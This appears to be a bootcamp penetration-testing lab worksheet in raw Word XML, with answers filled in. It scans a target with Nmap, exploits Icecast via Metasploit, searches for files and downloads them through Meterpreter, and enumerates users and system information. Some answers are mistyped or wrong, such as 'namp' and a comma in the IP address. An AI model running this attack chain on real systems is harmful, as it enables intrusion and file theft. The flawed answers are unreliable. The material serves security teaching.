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u9q3jwi7gcj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Instructions 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You've been provided full access to the network and are getting ping responses from the CEO’s workstation.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Perform a service and version scan using Nmap to determine which services are up and running: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Run the Nmap command that performs a service and version scan against the target.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Answer: namp -sV 192,168.0.8/24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005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From the previous step, we see that the Icecast service is running. Let's start by attacking that service. Search for any Icecast exploits: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Run the SearchSploit commands to show available Icecast exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A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br w:type="textWrapping"/>
        <w:t xml:space="preserve">Answer: searchsploit icecast</w:t>
      </w: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Now that we know which exploits are available to us, let's start Metasploit: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Run the command that starts Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F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br w:type="textWrapping"/>
        <w:t xml:space="preserve">Answer: msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010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9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Search for the Icecast module and load it for use.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Run the command to search for the Icecast module:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016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br w:type="textWrapping"/>
        <w:t xml:space="preserve">Answer: search icecast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Run the command to use the Icecast module:</w:t>
        <w:br w:type="textWrapping"/>
      </w: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Instead of copying the entire path to the module, you can use the number in front of it. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018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Answer: use 0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240" w:before="240" w:lineRule="auto"/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B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Set the RHOST to the target machine.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Run the command that sets the RHOST:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E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Answer  : set RHOST 192.168.0.20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F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47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Run the Icecast exploit.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Run the command that runs the Icecast exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022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br w:type="textWrapping"/>
        <w:t xml:space="preserve">Answer: exploit window/http/icecast_header &gt; run or exploit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Run the command that performs a search for the secretfile.txt on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024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br w:type="textWrapping"/>
        <w:t xml:space="preserve">Answer: search -f *secretfile*.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025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should now have a Meterpreter session open.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Run the command to performs a search for the recipe.txt on the target:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029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br w:type="textWrapping"/>
        <w:t xml:space="preserve">Answer: search -f *recipe*.txt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24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Bonus</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Run the command that exfiltrates the recipe*.txt file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B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br w:type="textWrapping"/>
        <w:t xml:space="preserve">Answer: download ‘c:\users\IEUser\Documents\Drinks.recipe.txt’</w:t>
      </w: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can also use Meterpreter's local exploit suggester to find possible exploits.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The exploit suggester is just that: a suggestion. Keep in mind that the listed suggestions may not include all available exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F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Run post/multi/recon/local_exploit_suggester</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030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p8thiufho0t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Bonus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A. Run a Meterpreter post script that enumerates all logged on users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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Answer: run post/windows/gather/enum_logged_on_users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="60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B. Open a Meterpreter shell and gather system information for the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038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Answer:shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="60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C. Run the command that displays the target's computer system information:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B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Answer:systeminfo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="60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600" w:right="60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© 2020 Trilogy Education Services, a 2U Inc Brand. All Rights Reserved.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3.png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.png"/><Relationship Id="rId18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